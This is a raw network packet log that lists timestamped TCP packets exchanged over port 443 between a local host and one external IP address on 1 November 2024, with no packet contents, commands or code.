Nov 1, 2024 20:57:49.775155067 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:49.775477886 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:49.775485992 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:49.776814938 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:49.776830912 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.581377029 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.581398010 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.581413031 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.581564903 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.581564903 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.581583977 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.581592083 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.581604004 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.581604004 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.581805944 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.581805944 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.581830025 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.581830025 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.581945896 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.593791962 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.593808889 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.593956947 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.593956947 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.594027996 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.594041109 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.594144106 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.594163895 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.667304039 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.667325974 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.667501926 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.667501926 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.667515993 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.667529106 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.667529106 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.667630911 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.667706966 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.780616045 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.780630112 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.780783892 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.780783892 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.780853987 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.780853987 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.780860901 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.780934095 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.780987978 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.818377972 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.818391085 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.818540096 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.818540096 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.818558931 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.818558931 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.818558931 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.818558931 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.818568945 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.818607092 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.818607092 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.818607092 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.818607092 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.818706036 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.858664989 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.858684063 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.858916044 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.858916044 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.858926058 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.858936071 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.859078884 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.940576077 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.940588951 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.940845013 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.940845013 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.940857887 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.941040993 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.975434065 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.975446939 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.975723028 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.975733042 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:50.975742102 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:50.975853920 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.006465912 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.006479979 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.006654024 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.006654024 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.006757975 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.006757975 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.006771088 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.006988049 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.030944109 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.030960083 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.031104088 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.031104088 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.031160116 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.031255007 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.031267881 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.031316996 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.031424999 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.051580906 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.051594973 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.051745892 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.051745892 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.051745892 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.051764011 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.051851988 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.051857948 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.052036047 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.072782040 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.072796106 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.072954893 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.072954893 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.073010921 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.073010921 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.073136091 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.073148012 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.073436022 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.093533993 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.093545914 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.093715906 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.093715906 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.093738079 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.093745947 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.093813896 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.093868971 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.093868971 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.093884945 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.129889965 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.129904032 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.130089045 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.130089045 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.130145073 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.130156994 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.130230904 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.130306005 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.149298906 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.149312019 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.149487019 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.149487019 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.149575949 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.149575949 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.149583101 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.149770021 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.166906118 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.166919947 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.167103052 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.167103052 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.167123079 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.167129993 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.167216063 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.167228937 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.167304993 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.182662964 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.182676077 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.182842016 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.182842016 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.182857037 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.182857037 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.183007956 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.183020115 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.183219910 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.199179888 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.199202061 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.199420929 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.199420929 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.199479103 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.199479103 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.199479103 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.199479103 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.199495077 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.199502945 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.199603081 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.199707985 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.215795994 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.215809107 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.215943098 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.215943098 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.216026068 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.216026068 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.216026068 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.216037035 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.216043949 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.216094971 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.216171980 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.228352070 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.228365898 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.228522062 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.228573084 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.228573084 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.228585005 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.228699923 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.228801012 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.243558884 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.243570089 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.243756056 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.243756056 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.243772030 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.243772030 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.243777990 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.243869066 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.243930101 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.256490946 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.256504059 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.256644964 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.256644964 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.256705046 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.256705046 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.256705046 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.256705046 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.256721020 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.256808996 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.256889105 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.270376921 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.270390987 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.270545959 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.270545959 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.270566940 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.270566940 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.270566940 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.270566940 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.270566940 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.270577908 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.270704031 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.270792007 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.467900991 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.467915058 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.468058109 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.468058109 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.468122959 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.468122959 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.468122959 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.468137980 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.468192101 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.468288898 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.473253965 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.473268032 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.473417997 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.473417997 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.473517895 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.473517895 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.473517895 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.473531008 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.473540068 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.473540068 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.473685026 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.484870911 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.484884977 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.484927893 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.484992027 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.485074043 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485074043 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485090971 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485097885 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.485177040 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485177040 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485177040 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485193014 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485193014 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485193014 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485202074 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.485269070 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485269070 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485269070 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485269070 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485269070 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485269070 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485287905 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485287905 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485367060 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485385895 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485438108 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485438108 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485483885 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485483885 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485536098 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485536098 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485536098 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485584974 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485589981 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.485635042 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485635042 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485635042 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485635042 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485635042 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.485732079 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.527739048 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.527756929 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.527813911 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.527856112 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.527898073 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.527940989 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.527946949 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.528012037 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.528012037 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.528012037 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.528060913 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.528089046 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.528089046 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.528089046 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.528136969 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.528136969 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.528137922 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.528137922 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.528235912 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.528235912 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.528332949 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550334930 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.550353050 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.550407887 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.550452948 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.550468922 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.550474882 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550474882 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550523043 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550523043 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550523043 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550523043 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550523043 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550539017 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.550571918 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550571918 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550571918 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550580978 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.550621033 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550621033 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550621033 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550621033 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550669909 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550669909 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550669909 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550683022 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.550767899 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550767899 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550767899 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550780058 CET	443	49806	188.245.203.37	192.168.11.20
Nov 1, 2024 20:57:51.550816059 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550865889 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550865889 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550865889 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550865889 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550914049 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550964117 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550964117 CET	49806	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:57:51.550964117 CET	49806	443	192.168.11.20	188.245.203.37
